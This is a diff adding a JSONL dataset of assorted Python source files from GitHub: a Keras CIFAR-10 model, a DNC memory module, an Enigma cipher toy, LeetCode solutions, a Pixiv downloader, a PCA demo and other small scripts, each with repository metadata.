diff --git "a/1562.jsonl" "b/1562.jsonl" new file mode 100644--- /dev/null +++ "b/1562.jsonl" @@ -0,0 +1,963 @@ +{"seq_id":"18132718192","text":"from keras.models import Sequential\nfrom keras.layers.core import Dense, Flatten, Activation, Dropout\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras.optimizers import RMSprop\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.datasets import cifar10\n\nfrom matplotlib import pyplot as plt\n\nIMG_CHANNELS = 3\nIMG_ROWS = 32\nIMG_COLS = 32\n\nBATCH_SIZE = 128\nEPOCHS = 20\nVALIDATION_SPLIT = 0.2\nVERBOSE = 1\nNB_CLASSES = 10\nOPTIM = RMSprop()\n\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train /= 255\nX_test /= 255\n\ny_train = np_utils.to_categorical(y_train, NB_CLASSES)\ny_test = np_utils.to_categorical(y_test, NB_CLASSES)\n\ndatagen = ImageDataGenerator(rotation_range=40, width_shift_range=0.2, height_shift_range=0.2, zoom_range=0.2, horizontal_flip=True)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=3, input_shape=(IMG_ROWS, IMG_COLS, IMG_CHANNELS), padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Conv2D(64, kernel_size=3, padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(Conv2D(64, kernel_size=3, padding='same'))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\n\nmodel.add(Flatten())\nmodel.add(Dense(512))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(NB_CLASSES))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer=OPTIM, metrics=['accuracy'])\n\ndatagen.fit(X_train)\nhistory = model.fit_generator(datagen.flow(X_train, y_train, batch_size=BATCH_SIZE),\n samples_per_epoch=X_train.shape[0],\n epochs=EPOCHS,\n validation_steps=VALIDATION_SPLIT,\n verbose=VERBOSE)\n\n\nprint('Testing...')\nscore = model.evaluate(X_test, y_test, batch_size=BATCH_SIZE, verbose=VERBOSE)\nprint(\"\\nTest score:\", score[0])\nprint('Test accuracy:', score[1])\n\n#save model\nmodel_json = model.to_json()\nopen('../../../cache/cifar10_architecture.json', 'w').write(model_json)\nmodel.save_weights('../../../cache/cifar10_weights.h5', overwrite=True)\n\n# list all data in history\nprint(history.history.keys())\n# summarize history for accuracy\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n# summarize history for loss\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.show()\n\n\n\n","repo_name":"chen0040/pydl-hands-on","sub_path":"pydl/keras/dcnn/cifar10/convnet_cifar10_data_aug.py","file_name":"convnet_cifar10_data_aug.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"9707638125","text":"# Desenvolva um programa que recebe do usuário nome completo e ano de nascimento que seja entre 1922 e 2021.\n# A partir dessas informações, o sistema mostrará o nome do usuário e a idade que completou, ou completará, no ano atual (2022).\n# Caso o usuário não digite um número ou apareça um inválido no campo do ano, o sistema informará o erro e continuará perguntando até que um valor correto seja preenchido.\n# Resposta:\nwhile True:\n nome = str(input(\"digite seu nome\"))\n nasceu = int(input(\"digite o ano que voce nasceu\"))\n if nasceu >= 1922 and nasceu <= 2021:\n idade = 2022 - nasceu\n print(nome, idade)\n break\n\n else:\n print(\n \"ano de nascimento deve ser maior que 1922 e menor que 2021, tente de novo\")\n","repo_name":"Vitor-Mateus-Dev/Proz","sub_path":"Atividades/nome_idade.py","file_name":"nome_idade.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2764780477","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\nimport sonnet as snt\nimport tensorflow as tf\n\nimport addressing\nimport util\n\nAccessState = collections.namedtuple('AccessState', (\n 'memory', 'read_weights', 'write_weights', 'linkage', 'usage'))\n\n\ndef _erase_and_write(memory, address, reset_weights, values):\n \"\"\"Module to erase and write in the external memory.\n\n Erase operation:\n M_t'(i) = M_{t-1}(i) * (1 - w_t(i) * e_t)\n\n Add operation:\n M_t(i) = M_t'(i) + w_t(i) * a_t\n\n where e are the reset_weights, w the write weights and a the values.\n\n Args:\n memory: 3-D tensor of shape `[batch_size, memory_size, word_size]`.\n address: 3-D tensor `[batch_size, num_writes, memory_size]`.\n reset_weights: 3-D tensor `[batch_size, num_writes, word_size]`.\n values: 3-D tensor `[batch_size, num_writes, word_size]`.\n\n Returns:\n 3-D tensor of shape `[batch_size, num_writes, word_size]`.\n \"\"\"\n with tf.name_scope('erase_memory', values=[memory, address, reset_weights]):\n expand_address = tf.expand_dims(address, 3)\n reset_weights = tf.expand_dims(reset_weights, 2)\n weighted_resets = expand_address * reset_weights\n reset_gate = tf.reduce_prod(1 - weighted_resets, [1])\n memory *= reset_gate\n\n with tf.name_scope('additive_write', values=[memory, address, values]):\n add_matrix = tf.matmul(address, values, adjoint_a=True)\n memory += add_matrix\n\n return memory\n\n\nclass MemoryAccess(snt.RNNCore):\n \"\"\"Access module of the Differentiable Neural Computer.\n\n This memory module supports multiple read and write heads. It makes use of:\n\n * `addressing.TemporalLinkage` to track the temporal ordering of writes in\n memory for each write head.\n * `addressing.FreenessAllocator` for keeping track of memory usage, where\n usage increase when a memory location is written to, and decreases when\n memory is read from that the controller says can be freed.\n\n Write-address selection is done by an interpolation between content-based\n lookup and using unused memory.\n\n Read-address selection is done by an interpolation of content-based lookup\n and following the link graph in the forward or backwards read direction.\n \"\"\"\n\n def __init__(self,\n memory_size=128,\n word_size=20,\n num_reads=1,\n num_writes=1,\n name='memory_access'):\n \"\"\"Creates a MemoryAccess module.\n\n Args:\n memory_size: The number of memory slots (N in the DNC paper).\n word_size: The width of each memory slot (W in the DNC paper)\n num_reads: The number of read heads (R in the DNC paper).\n num_writes: The number of write heads (fixed at 1 in the paper).\n name: The name of the module.\n \"\"\"\n super(MemoryAccess, self).__init__(name=name)\n self._memory_size = memory_size\n self._word_size = word_size\n self._num_reads = num_reads\n self._num_writes = num_writes\n\n self._write_content_weights_mod = addressing.CosineWeights(\n num_writes, word_size, name='write_content_weights')\n self._read_content_weights_mod = addressing.CosineWeights(\n num_reads, word_size, name='read_content_weights')\n\n self._linkage = addressing.TemporalLinkage(memory_size, num_writes)\n self._freeness = addressing.Freeness(memory_size)\n\n def _build(self, inputs, prev_state):\n \"\"\"Connects the MemoryAccess module into the graph.\n\n Args:\n inputs: tensor of shape `[batch_size, input_size]`. This is used to\n control this access module.\n prev_state: Instance of `AccessState` containing the previous state.\n\n Returns:\n A tuple `(output, next_state)`, where `output` is a tensor of shape\n `[batch_size, num_reads, word_size]`, and `next_state` is the new\n `AccessState` named tuple at the current time t.\n \"\"\"\n inputs = self._read_inputs(inputs)\n\n # Update usage using inputs['free_gate'] and previous read & write weights.\n usage = self._freeness(\n write_weights=prev_state.write_weights,\n free_gate=inputs['free_gate'],\n read_weights=prev_state.read_weights,\n prev_usage=prev_state.usage)\n\n # Write to memory.\n write_weights = self._write_weights(inputs, prev_state.memory, usage)\n memory = _erase_and_write(\n prev_state.memory,\n address=write_weights,\n reset_weights=inputs['erase_vectors'],\n values=inputs['write_vectors'])\n\n linkage_state = self._linkage(write_weights, prev_state.linkage)\n\n # Read from memory.\n read_weights = self._read_weights(\n inputs,\n memory=memory,\n prev_read_weights=prev_state.read_weights,\n link=linkage_state.link)\n read_words = tf.matmul(read_weights, memory)\n\n return (read_words, AccessState(\n memory=memory,\n read_weights=read_weights,\n write_weights=write_weights,\n linkage=linkage_state,\n usage=usage))\n\n def _read_inputs(self, inputs):\n \"\"\"Applies transformations to `inputs` to get control for this module.\"\"\"\n\n def _linear(first_dim, second_dim, name, activation=None):\n \"\"\"Returns a linear transformation of `inputs`, followed by a reshape.\"\"\"\n linear = snt.Linear(first_dim * second_dim, name=name)(inputs)\n if activation is not None:\n linear = activation(linear, name=name + '_activation')\n return tf.reshape(linear, [-1, first_dim, second_dim])\n\n # v_t^i - The vectors to write to memory, for each write head `i`.\n write_vectors = _linear(self._num_writes, self._word_size, 'write_vectors')\n\n # e_t^i - Amount to erase the memory by before writing, for each write head.\n erase_vectors = _linear(self._num_writes, self._word_size, 'erase_vectors',\n tf.sigmoid)\n\n # f_t^j - Amount that the memory at the locations read from at the previous\n # time step can be declared unused, for each read head `j`.\n free_gate = tf.sigmoid(\n snt.Linear(self._num_reads, name='free_gate')(inputs))\n\n # g_t^{a, i} - Interpolation between writing to unallocated memory and\n # content-based lookup, for each write head `i`. Note: `a` is simply used to\n # identify this gate with allocation vs writing (as defined below).\n allocation_gate = tf.sigmoid(\n snt.Linear(self._num_writes, name='allocation_gate')(inputs))\n\n # g_t^{w, i} - Overall gating of write amount for each write head.\n write_gate = tf.sigmoid(\n snt.Linear(self._num_writes, name='write_gate')(inputs))\n\n # \\pi_t^j - Mixing between \"backwards\" and \"forwards\" positions (for\n # each write head), and content-based lookup, for each read head.\n num_read_modes = 1 + 2 * self._num_writes\n read_mode = snt.BatchApply(tf.nn.softmax)(\n _linear(self._num_reads, num_read_modes, name='read_mode'))\n\n # Parameters for the (read / write) \"weights by content matching\" modules.\n write_keys = _linear(self._num_writes, self._word_size, 'write_keys')\n write_strengths = snt.Linear(self._num_writes, name='write_strengths')(\n inputs)\n\n read_keys = _linear(self._num_reads, self._word_size, 'read_keys')\n read_strengths = snt.Linear(self._num_reads, name='read_strengths')(inputs)\n\n result = {\n 'read_content_keys': read_keys,\n 'read_content_strengths': read_strengths,\n 'write_content_keys': write_keys,\n 'write_content_strengths': write_strengths,\n 'write_vectors': write_vectors,\n 'erase_vectors': erase_vectors,\n 'free_gate': free_gate,\n 'allocation_gate': allocation_gate,\n 'write_gate': write_gate,\n 'read_mode': read_mode,\n }\n return result\n\n def _write_weights(self, inputs, memory, usage):\n \"\"\"Calculates the memory locations to write to.\n\n This uses a combination of content-based lookup and finding an unused\n location in memory, for each write head.\n\n Args:\n inputs: Collection of inputs to the access module, including controls for\n how to chose memory writing, such as the content to look-up and the\n weighting between content-based and allocation-based addressing.\n memory: A tensor of shape `[batch_size, memory_size, word_size]`\n containing the current memory contents.\n usage: Current memory usage, which is a tensor of shape `[batch_size,\n memory_size]`, used for allocation-based addressing.\n\n Returns:\n tensor of shape `[batch_size, num_writes, memory_size]` indicating where\n to write to (if anywhere) for each write head.\n \"\"\"\n with tf.name_scope('write_weights', values=[inputs, memory, usage]):\n # c_t^{w, i} - The content-based weights for each write head.\n write_content_weights = self._write_content_weights_mod(\n memory, inputs['write_content_keys'],\n inputs['write_content_strengths'])\n\n # a_t^i - The allocation weights for each write head.\n write_allocation_weights = self._freeness.write_allocation_weights(\n usage=usage,\n write_gates=(inputs['allocation_gate'] * inputs['write_gate']),\n num_writes=self._num_writes)\n\n # Expands gates over memory locations.\n allocation_gate = tf.expand_dims(inputs['allocation_gate'], -1)\n write_gate = tf.expand_dims(inputs['write_gate'], -1)\n\n # w_t^{w, i} - The write weightings for each write head.\n return write_gate * (allocation_gate * write_allocation_weights +\n (1 - allocation_gate) * write_content_weights)\n\n def _read_weights(self, inputs, memory, prev_read_weights, link):\n \"\"\"Calculates read weights for each read head.\n\n The read weights are a combination of following the link graphs in the\n forward or backward directions from the previous read position, and doing\n content-based lookup. The interpolation between these different modes is\n done by `inputs['read_mode']`.\n\n Args:\n inputs: Controls for this access module. This contains the content-based\n keys to lookup, and the weightings for the different read modes.\n memory: A tensor of shape `[batch_size, memory_size, word_size]`\n containing the current memory contents to do content-based lookup.\n prev_read_weights: A tensor of shape `[batch_size, num_reads,\n memory_size]` containing the previous read locations.\n link: A tensor of shape `[batch_size, num_writes, memory_size,\n memory_size]` containing the temporal write transition graphs.\n\n Returns:\n A tensor of shape `[batch_size, num_reads, memory_size]` containing the\n read weights for each read head.\n \"\"\"\n with tf.name_scope(\n 'read_weights', values=[inputs, memory, prev_read_weights, link]):\n # c_t^{r, i} - The content weightings for each read head.\n content_weights = self._read_content_weights_mod(\n memory, inputs['read_content_keys'], inputs['read_content_strengths'])\n\n # Calculates f_t^i and b_t^i.\n forward_weights = self._linkage.directional_read_weights(\n link, prev_read_weights, forward=True)\n backward_weights = self._linkage.directional_read_weights(\n link, prev_read_weights, forward=False)\n\n backward_mode = inputs['read_mode'][:, :, :self._num_writes]\n forward_mode = (\n inputs['read_mode'][:, :, self._num_writes:2 * self._num_writes])\n content_mode = inputs['read_mode'][:, :, 2 * self._num_writes]\n\n read_weights = (\n tf.expand_dims(content_mode, 2) * content_weights + tf.reduce_sum(\n tf.expand_dims(forward_mode, 3) * forward_weights, 2) +\n tf.reduce_sum(tf.expand_dims(backward_mode, 3) * backward_weights, 2))\n\n return read_weights\n\n @property\n def state_size(self):\n \"\"\"Returns a tuple of the shape of the state tensors.\"\"\"\n return AccessState(\n memory=tf.TensorShape([self._memory_size, self._word_size]),\n read_weights=tf.TensorShape([self._num_reads, self._memory_size]),\n write_weights=tf.TensorShape([self._num_writes, self._memory_size]),\n linkage=self._linkage.state_size,\n usage=self._freeness.state_size)\n\n @property\n def output_size(self):\n \"\"\"Returns the output shape.\"\"\"\n return tf.TensorShape([self._num_reads, self._word_size])\n","repo_name":"huseinzol05/Stock-Prediction-Models","sub_path":"deep-learning/access.py","file_name":"access.py","file_ext":"py","file_size_in_byte":12286,"program_lang":"python","lang":"en","doc_type":"code","stars":6916,"dataset":"github-code","pt":"48"} +{"seq_id":"11679074571","text":"alfabeto = \"abcdefghijklmnopqrstuvwxyz\"\ndef cesarecifra(lettera,chiave):\n indice = alfabeto.index(lettera)\n indice = (indice + chiave) % len(alfabeto)\n return alfabeto[indice]\ndef scambiatore(lettera):\n indice = alfabeto.index(lettera)\n indice = len(alfabeto) - indice % len(alfabeto)\n return alfabeto[indice]\n\n#chiavi\nprint(\"inserisci le chiavi dei tre rotori\")\nchiave1 = int(input());\nchiave2 = int(input());\nchiave3 = int(input());\n\n#stecker\nquadro = list(\"abcdefghijklmnopqrstuvwxyz\")\nprint(\"inserisci 6 coppie di lettere\")\nfor i in range(0,6):\n coppia = input()\n lettera1 = coppia[0]\n lettera2 = coppia[1]\n indice1 = quadro.index(lettera1)\n indice2 = quadro.index(lettera2)\n tmp = quadro[indice1] \n quadro[indice1] = quadro[indice2]\n quadro[indice2] = tmp\n\n#cifra la parola\nprint(\"inserisci la frase\")\nfrase = input()\ncifrata = \"\"\nfor i in range(0,len(frase)):\n #stecker\n indice = alfabeto.index(frase[i])\n uscita = quadro[indice]\n\n #rotori\n uscita_r1 = cesarecifra(uscita,chiave1)\n uscita_r2 = cesarecifra(uscita_r1,chiave2)\n uscita_r3 = cesarecifra(uscita_r2,chiave3)\n\n #riflettore\n uscita_rif = scambiatore(uscita_r3)\n\n #rotori (indietro)\n uscita_r4 = cesarecifra(uscita_rif,-chiave1)\n uscita_r5 = cesarecifra(uscita_r4,-chiave2)\n uscita_r6 = cesarecifra(uscita_r5,-chiave3)\n\n #stecker (indietro)\n indice = alfabeto.index(uscita_r6)\n uscita = quadro[indice]\n\n cifrata = cifrata + uscita\n \n #movimento rotori dopo ogni lettera\n chaive1 = chiave1 +1\n if chiave1 > len(alfabeto):\n chiave1 = 0\n chiave2 = chiave2 + 1\n if chiave2 > len(alfabeto):\n chiave2 = 0\n chiave3 = chiave3 + 1\n if chiave3 > len(alfabeto):\n chiave3 = 0\nprint(cifrata)\n","repo_name":"DiniSauri/dinicode","sub_path":"crittografia/enigma.py","file_name":"enigma.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12739752325","text":"from typing import List\r\n\r\n\r\nclass Solution:\r\n\r\n MAX_WEIGHT = 500\r\n\r\n def shipWithinDays(self, weights: List[int], D: int) -> int:\r\n low, high = 0, len(weights) * Solution.MAX_WEIGHT\r\n possible = self.possible\r\n while low < high:\r\n mid = low + (high - low) // 2\r\n if possible(weights, D, mid):\r\n high = mid\r\n else:\r\n low = mid + 1\r\n return high\r\n\r\n def possible(self, weights: List[int], D: int, capacity: int) -> bool:\r\n ship = 0\r\n current = 0\r\n for weight in weights:\r\n if current + weight > capacity:\r\n ship += 1\r\n if ship > D:\r\n return False\r\n current = weight\r\n if current > capacity:\r\n return False\r\n else:\r\n current += weight\r\n if current > 0:\r\n ship += 1\r\n return ship <= D\r\n","repo_name":"sandychn/LeetCode-Solutions","sub_path":"Algorithms/BinarySearch/1011-capacity-to-ship-packages-within-d-days.py","file_name":"1011-capacity-to-ship-packages-within-d-days.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21404489871","text":"import asyncio\nimport aio_pika\n\n\nasync def main(loop):\n connection = await aio_pika.connect_robust(\n \"amqp://guest:guest@127.0.0.1/\", loop=loop\n )\n\n async with connection:\n routing_key = \"test_queue\"","repo_name":"Skylar-Kerzner/when-the","sub_path":"when_the/lib/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6686383459","text":"from langchain.document_loaders import UnstructuredURLLoader\nimport session_info\n\nfrom chatbot_settings import ChatBotSettings\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.schema import (\n SystemMessage,\n HumanMessage,\n AIMessage\n)\n\nchatbotSettings = ChatBotSettings()\n\nsession_info.show()\n\nurls = [\n \"https://www.understandingwar.org/backgrounder/russian-offensive-campaign-assessment-february-8-2023\",\n \"https://www.understandingwar.org/backgrounder/russian-offensive-campaign-assessment-february-9-2023\",\n]\n\nprint(urls)\n\nloader = UnstructuredURLLoader(urls=urls)\n\nprint(loader)\n\ndata = loader.load()\n\nprint(data)\n\n","repo_name":"ggrow3/ExtensibleChatBot","sub_path":"misc_url_loader.py","file_name":"misc_url_loader.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"18027130245","text":"# import package\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\n\n# import datasets\nfrom sklearn.datasets import load_breast_cancer\ncancer=load_breast_cancer()\nprint(cancer.keys())\n\ndf=pd.DataFrame(cancer['data'],columns=cancer['feature_names'])\nprint(df.head(5))\n\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler\nscaler=StandardScaler()\nscaler.fit(df)\nStandardScaler(copy=True, with_mean=True, with_std=True)\nscaled_data=scaler.transform(df)\nprint(scaled_data)\n\npca=PCA(n_components=2)\npca.fit(scaled_data)\n\nx_pca=pca.transform(scaled_data)\nprint(scaled_data.shape)\n\nprint(x_pca.shape)\n\nscaled_data\n\nprint(x_pca)\n\nplt.figure(figsize=(8,6))\nplt.scatter(x_pca[:,0],x_pca[:,1],c=cancer['target'])\nplt.xlabel('First principle component')\nplt.ylabel('Second principle component')\nplt.show()\n\n","repo_name":"kecoaktempur/Machine-Learning-Prak-Smt4","sub_path":"TM 5 - Extraction and Selection Feature/week 5.py","file_name":"week 5.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44194000486","text":"from models.event import EventModel\nfrom db import db\n\n\nclass OrdersModel(db.Model):\n __tablename__ = 'orders'\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(30), db.ForeignKey('accounts.username'), nullable=False)\n id_event = db.Column(db.Integer, nullable=False)\n tickets_bought = db.Column(db.Integer, nullable=False)\n\n def json(self):\n event = EventModel.find_by_id(self.id_event)\n return {\n \"Id\": self.id_event,\n \"Username\": self.username,\n \"Event_name\": event.name,\n \"Event_date\": event.date,\n \"Event_city\": event.city,\n \"Tickets_bought\": self.tickets_bought\n }\n\n def save_to_db(self):\n if self.id and OrdersModel.query.get(self.id):\n db.session.commit()\n else:\n db.session.add(self)\n db.session.commit()\n\n\n def delete_from_db(self):\n if self.id and OrdersModel.query.get(self.id):\n db.session.delete(self)\n db.session.commit()\n else:\n raise Exception(\"Warning not in DB\")\n\n @classmethod\n def find_by_username(cls, username):\n if username:\n return OrdersModel.query.filter_by(username=username).all()\n else:\n return None\n\n @classmethod\n def find_all(cls):\n return OrdersModel.query.all()\n\n def __init__(self, id_event, tickets_bought):\n self.id_event = id_event\n self.tickets_bought = tickets_bought\n","repo_name":"aldakata/SD_p2","sub_path":"backend/models/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42113390315","text":"# Write a function called list_manipulator which receives a list of numbers as first parameter and different amount of\r\n# other parameters. The second parameter might be \"add\" or \"remove\". The third parameter might be \"beginning\" or \"end\".\r\n# There might or might not be any other parameters (numbers):\r\n# •\tIn case of \"add\" and \"beginning\", add the given numbers to the beginning of the given list of numbers and\r\n# return the new list\r\n# •\tIn case of \"add\" and \"end\", add the given numbers to the end of the given list of numbers and return the new list\r\n# •\tIn case of \"remove\" and \"beginning\"\r\n# o\tIf there is another parameter (number), remove that amount of numbers from the beginning of the list of numbers.\r\n# o\tIf there are no other parameters, remove only the first element of the list.\r\n# o\tFinaly, return the new list\r\n# •\tIn case of \"remove\" and \"end\"\r\n# o\tIf there is another parameter (number), remove that amount of numbers from the end of the list of numbers.\r\n# o\tOtherwise if there are no other parameters, remove only the last element of the list.\r\n# o\tFinaly, return the new list\r\n# For more clarifications, see the examples below.\r\n\r\n\r\nfrom collections import deque\r\n\r\n\r\ndef list_manipulator(current_lst, operation, position, *args):\r\n new_list = deque(current_lst)\r\n\r\n if operation == 'add':\r\n if position == 'beginning':\r\n if len(args) > 0:\r\n new_list = deque(args) + new_list\r\n\r\n elif position == 'end':\r\n if len(args) > 0:\r\n new_list += deque(args)\r\n\r\n elif operation == 'remove':\r\n if position == 'beginning':\r\n if 0 <= len(args) <= 1:\r\n n = args[0] if len(args) == 1 else 1\r\n fn = new_list.popleft if position == 'beginning' else new_list.pop\r\n for _ in range(n):\r\n fn()\r\n\r\n elif position == 'end':\r\n if 0 <= len(args) <= 1:\r\n n = args[0] if len(args) == 1 else 1\r\n fn = new_list.popleft if position == 'beginning' else new_list.pop\r\n for _ in range(n):\r\n fn()\r\n\r\n return list(new_list)\r\n\r\n\r\nprint(list_manipulator([1, 2, 3], \"remove\", \"end\"))\r\nprint(list_manipulator([1, 2, 3], \"remove\", \"beginning\"))\r\nprint(list_manipulator([1, 2, 3], \"add\", \"beginning\", 20))\r\nprint(list_manipulator([1, 2, 3], \"add\", \"end\", 30))\r\nprint(list_manipulator([1, 2, 3], \"remove\", \"end\", 2))\r\nprint(list_manipulator([1, 2, 3], \"remove\", \"beginning\", 2))\r\nprint(list_manipulator([1, 2, 3], \"add\", \"beginning\", 20, 30, 40))\r\nprint(list_manipulator([1, 2, 3], \"add\", \"end\", 30, 40, 50))\r\n","repo_name":"AlexanderIvanofff/Python-OOP","sub_path":"Multidimensional Lists/list_manipulator.py","file_name":"list_manipulator.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41494184528","text":"from pynput import mouse\n\ndef on_click(x, y,button,pressed):\n if pressed:\n print(str(button)+\" pressed(\"+str(x)+\", \"+str(y)+\")\")\n else:\n print(str(button)+\" released at (\"+str(x)+\", \"+str(y)+\")\")\n\nwith mouse.Listener(\n on_click=on_click) as listener:\n\n listener.join()\n\n\nlistener = mouse.Listener(\n #on_press=on_press,\n #on_release=on_release\n on_click=on_click)\nlistener.start()","repo_name":"erdebankadas/Automated_mouse_monitor","sub_path":"mouse.py","file_name":"mouse.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35123766875","text":"import requests\nimport re\nimport html\nfrom pipe_fn import e\nimport json\nimport os.path\nimport bs4\n\nimg_url = \"https://i.pximg.net/img-original/img/{date}/{pid}_p{page}.{ext}\"\nartworks_url = \"https://www.pixiv.net/artworks/{pid}\"\n\n\ndef get_info(illust_id):\n url = artworks_url.format(pid=illust_id)\n response = requests.get(url)\n soup = bs4.BeautifulSoup(response.content)\n content = json.loads(soup.find(\"meta\", id=\"meta-preload-data\")[\"content\"])\n return {\n \"id\": content[\"illust\"][illust_id][\"id\"],\n \"title\": content[\"illust\"][illust_id][\"title\"],\n \"description\": content[\"illust\"][illust_id][\"description\"],\n \"illustType\": content[\"illust\"][illust_id][\"illustType\"],\n \"xRestrict\": content[\"illust\"][illust_id][\"xRestrict\"],\n \"tags\": content[\"illust\"][illust_id][\"tags\"][\"tags\"]\n | e / map @ (lambda t: t[\"tag\"])\n | e / list,\n \"pageCount\": content[\"illust\"][illust_id][\"pageCount\"],\n \"bookmarkCount\": content[\"illust\"][illust_id][\"bookmarkCount\"],\n \"likeCount\": content[\"illust\"][illust_id][\"likeCount\"],\n \"viewCount\": content[\"illust\"][illust_id][\"viewCount\"],\n }\n\n\ndef dict2cookie(cookie):\n return (\n list(cookie.items())\n | e / map @ (lambda x: str(x[0]) + \"=\" + str(x[1]))\n | e / \";\".join\n )\n\n\ndef get_image_ext(date, pid):\n url = img_url.format(date=date, pid=pid, page=0, ext=\"jpg\")\n x = requests.head(url, headers={\"referer\": url})\n if x.status_code == 200:\n return \"jpg\"\n else:\n # normally there are only two formats\n return \"png\"\n\n\ndef get_newest_followed_illusts(cookie, page_id):\n def extract_date(illust):\n url = illust[\"url\"]\n date = re.compile(\n r\"img-master/img/(\\d{4}/\\d{2}/\\d{2}/\\d{2}/\\d{2}/\\d{2})/\"\n ).findall(url)[0]\n return date\n\n patt = re.compile(\n '
'\n )\n url = f\"https://www.pixiv.net/bookmark_new_illust.php?p={page_id}\"\n response = requests.get(\n url, params={\"p\": page_id}, headers={\"cookie\": dict2cookie(cookie)}\n )\n result = patt.findall(response.content.decode())\n return (\n result[0]\n | e / html.unescape\n | e / json.loads\n | e / filter @ (lambda x: x[\"illustType\"] != \"2\") # ignore animate\n | e / map @ (lambda x: (x[\"illustId\"], extract_date(x), x[\"pageCount\"]))\n | e / map @ (lambda x: (x[0], x[1], x[2], get_image_ext(x[1], x[0])))\n | e / list\n )\n\n\ndef download_newest_followed_illusts(cookie, latest_pid, dest):\n lst = []\n k = 1\n p = get_newest_followed_illusts(cookie, k)\n ret = p | e / map @ (lambda x: int(x[0])) | e / max\n p = p | e / filter @ (lambda x: int(x[0]) > latest_pid) | e / list\n while p:\n download_list(p, dest)\n k += 1\n p = (\n get_newest_followed_illusts(cookie, k)\n | e / filter @ (lambda x: int(x[0]) > latest_pid)\n | e / list\n )\n return (ret, lst)\n\n\ndef download_list(lst, dest, filtering=lambda x: True):\n for illust in lst:\n if not filtering(illust):\n continue\n # illust :: (pid, date, page count, ext)\n for page in range(0, int(illust[2])):\n name = \"{}_p{}.{}\".format(illust[0], page, illust[3])\n with open(os.path.join(dest, name), \"wb\") as f:\n url = img_url.format(\n pid=illust[0], date=illust[1], ext=illust[3], page=page\n )\n print(\"Downloading {}\".format(url))\n response = requests.get(url, headers={\"referer\": url})\n print(\"Response: {}\".format(response.status_code))\n if response.status_code != 200:\n continue\n f.write(response.content)\n return True\n\n\ndef main(\n cookie={\n \"device_token\": \"\",\n \"PHPSESSID\": \"\",\n },\n latest_pid=\"81515705\",\n dest=\"D:\\\\palette\\\\Sync\\\\Devices\",\n):\n if os.path.isfile(\"prop/latest_pid\"):\n with open(\"prop/latest_pid\", \"r\") as f:\n latest_pid = f.readline()\n latest_pid, _ = download_newest_followed_illusts(\n cookie, int(latest_pid), \"D:\\\\palette\\\\Sync\\\\Devices\"\n )\n with open(\"prop/latest_pid\", \"w\") as f:\n f.write(str(latest_pid))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"paletteOvO/CodeColle","sub_path":"Python/waifu/pixiv.py","file_name":"pixiv.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34273977045","text":"import unittest\nfrom house_scrapping.remax_url_scrapper import RemaxURLScraper\n\nclass TestRemaxWebScraper(unittest.TestCase):\n def test_set_search_param(self):\n \"\"\"Test if the set_search_param method correctly updates search parameters.\"\"\"\n scraper = RemaxURLScraper()\n scraper.set_search_param(\"rooms\", 3)\n self.assertEqual(scraper.search_params[\"rooms\"], 3)\n\n def test_scrape_listing_urls(self):\n \"\"\"Test if the scrape_listing_urls method returns valid listing URLs.\"\"\"\n scraper = RemaxWebScraper()\n urls = scraper.scrape_listing_urls()\n \n # Check if the returned URLs are valid by verifying their format\n self.assertIsInstance(urls, list)\n self.assertTrue(all(url.startswith(\"https://remax.pt/\") for url in urls))\n\nif __name__ == '__main__':\n 